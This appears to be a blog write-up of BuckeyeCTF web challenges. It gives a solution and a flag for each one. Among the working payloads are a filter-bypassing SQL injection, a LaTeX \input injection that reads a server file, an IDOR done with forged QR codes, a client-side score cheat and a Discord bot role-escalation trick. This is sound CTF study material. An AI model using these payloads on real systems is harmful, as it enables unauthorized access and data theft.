● buckeyenotes
The word "=" is filtered. Bypass it.
Payload :
' or username like 'brutusB3stNut9999' and password like '%a%'--Flag :
buckeye{wr1t3_ur_0wn_0p3n_2_pwn}
● pong
I can't find any flag in this service. I guessed if I win this game, I can get a flag.
There are no given source code. So I just looked up devtools, then I could find below code.
const socket = io();
const canvas = document.getElementById("game");
const pl = .16;
const pw = .02;
const bs = .04;
var up = 0;
var down = 0;
var p1 = .5;
var p2 = .5;
var bx = .5;
var by = .5;
var bvx = 0;
var bvy = 0;
var spin = 0;
var bt = 0;
var s1 = 0;
var s2 = 0;
function reset(ctx) {
ctx.resetTransform();
ctx.translate(0, 0.5);
ctx.lineWidth = 1;
}
function set() {
bx = 0.5;
by = 0.5;
bvx = 0;
bvy = 0;
bt = 0;
spin = 0;
}
function draw() {
canvas.width = canvas.clientWidth;
canvas.height = canvas.clientHeight;
const w = canvas.width;
const h = canvas.height;
const ctx = canvas.getContext("2d");
reset(ctx);
ctx.fillStyle = "#FFFFFF";
ctx.fillRect(0, 0, w, h);
// field lines
ctx.fillStyle = "#aaaaaa";
for(var y = 0; y < 1; y += .1) {
ctx.fillRect(w / 2 - 5, (y + .025) * h, 10, .05 * h);
}
// ball
ctx.fillStyle = "#000000";
ctx.translate(bx * w, by * h);
bt += spin;
while(bt < 0) bt += 360;
while(bt > 359) bt -= 360;
ctx.rotate(bt * Math.PI / 180);
ctx.fillRect(-(bs * h) / 2, -(bs * h) / 2, bs * h, bs * h);
reset(ctx);
// paddles
ctx.fillStyle = "#000000";
ctx.fillRect(pw * w, (p1 - pl / 2) * h, pw * w, pl * h);
ctx.fillRect((1 - 2 * pw) * w, (p2 - pl / 2) * h, pw * w, pl * h);
// scores
for(var x = 0; x < 20; x++) {
ctx.beginPath();
ctx.rect(x * .05 * w, 0, .05 * w, 0.01 * h);
ctx.stroke();
if(x < s1) ctx.fillRect(x * .05 * w, 0, .05 * w, 0.01 * h);
if(x > 9 && s2 > 19 - x) ctx.fillRect(x * .05 * w, 0, .05 * w, 0.01 * h);
}
}
function tick() {
const w = canvas.width;
const h = canvas.height;
// controls
if(p1 - up * .01 > pl / 2) p1 -= up * .01;
if(p1 + down * .01 < 1 - pl / 2) p1 += down * .01;
p2 = by;
// ball
if(bvx != 0) spin = bvy / bvx * 5;
bx += bvx;
by += bvy;
if(by < 0 || by > 1) bvy *= -1; // v bounce
if(bx < pw * 2) {
// left paddle bounce
if(by > p1 - pl / 2 && by < p1 + pl / 2) {
let diff = by - p1;
bvy = .015 * diff / (pl / 2);
bvx = .015 - Math.abs(bvy);
}
}
if(bx > 1 - pw * 2) {
// right paddle bounce
if(by > p2 - pl / 2 && by < p2 + pl / 2) {
let diff = by - p2;
bvy = .015 * diff / (pl / 2);
bvx = -(.015 - Math.abs(bvy));
}
}
if(bx < -.1 || bx > 1.1) {
socket.emit("score", bx);
}
draw();
}
function init() {
draw();
setInterval(tick, 13);
document.addEventListener("keydown", (e) => {
if(e.key == "w") up = 1;
if(e.key == "s") down = 1;
if(e.key == "p") {
socket.emit("begin");
}
});
document.addEventListener("keyup", (e) => {
if(e.key == "w") up = 0;
if(e.key == "s") down = 0;
});
}
socket.on("alert", (msg) => alert(msg));
socket.on("begin", (params) => {
bvx = params.bvx;
bvy = params.bvy;
});
socket.on("set", (scores) => {
set();
s1 = scores.sx1;
s2 = scores.sx2;
});It seems that variable "bx" is related to ball. What if I manipulate "bx" and win the game? maybe I can get a flag.
if(bx < -.1 || bx > 1.1) {
socket.emit("score", bx);
}There must be a meaning for the developer to use conditional sentences to control a service. I got a hint from here. What if I input a number bigger than 1.1?
Payload :
// In devtools console
bx = 10
Flag :
buckeye{1f_3v3ry0n3_ch3475_175_f41r}
● textual
Reference : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection
Payload :
: \input{/home/ctf/app/flag.tex}Flag :
buckeye{w41t_3v3n_l4t3x_15_un54f3}
● Scanbook - IDOR Vulnerability
The service can either make qr code and check qr code. I wrote down "asdfasf" for test, then service made a qrcode.
I tested more, then I can found filename of png. All file names only consist of numbers. I tested same qrcode in online qrcode reader.
The decoded result is filename, not file's content.
And I also found that if I make more file, the number of filename goes bigger. This service might be vulnerable to IDOR.
I can guess that "1.png" is flag file. I used online_barcode_generator.
Put this QR into problem service.
Then it said "Sorry, we lost your post.". If 1.png is not correct answer, put "0.png".
Flag :
buckeye{4n_1d_numb3r_15_N07_4_p455w0rd}
● Quiz Bot
Join the discord link.
Bot explains how I can use this. According to it, I can use "!quiz" command to start.
# bot.py
...
@client.event
async def on_raw_reaction_add(event):
emoji = event.emoji
user = client.get_user(event.user_id)
member = guild.get_member(event.user_id)
channel = client.get_channel(event.channel_id)
message = await channel.fetch_message(event.message_id)
if (
message.author != client.user
or user == client.user
):
return
lines = message.content.split("\n")[1:]
for line in lines:
try:
line_reaction, role_name = line.strip().split(" ", 1)
except ValueError:
continue
if str(emoji) == line_reaction:
role = discord.utils.get(guild.roles, name=role_name)
if member:
await member.add_roles(role)
...Let's understand the code.
1. Check if I reacted on a message sent by the bot.
2. split message if "\n" exists.
3. Compare between the given emoji(the first emoji that you input) and emoji that I used to react.
4. If the given emoji is as same as emoji I used to react, I can get admin role.
Payload :
!quiz
❤️ admin
:bimbo:brutus:440028476969420/222:wenis:sweaty:behind the taco bell
Then, enter into OSU academic team server, "#admin-only"
Flag :
buckeye{5tat3l355_m0r3_L1K3_DaT3L355}
Problems I couldn't solve ( will be write later )
goober / shortbread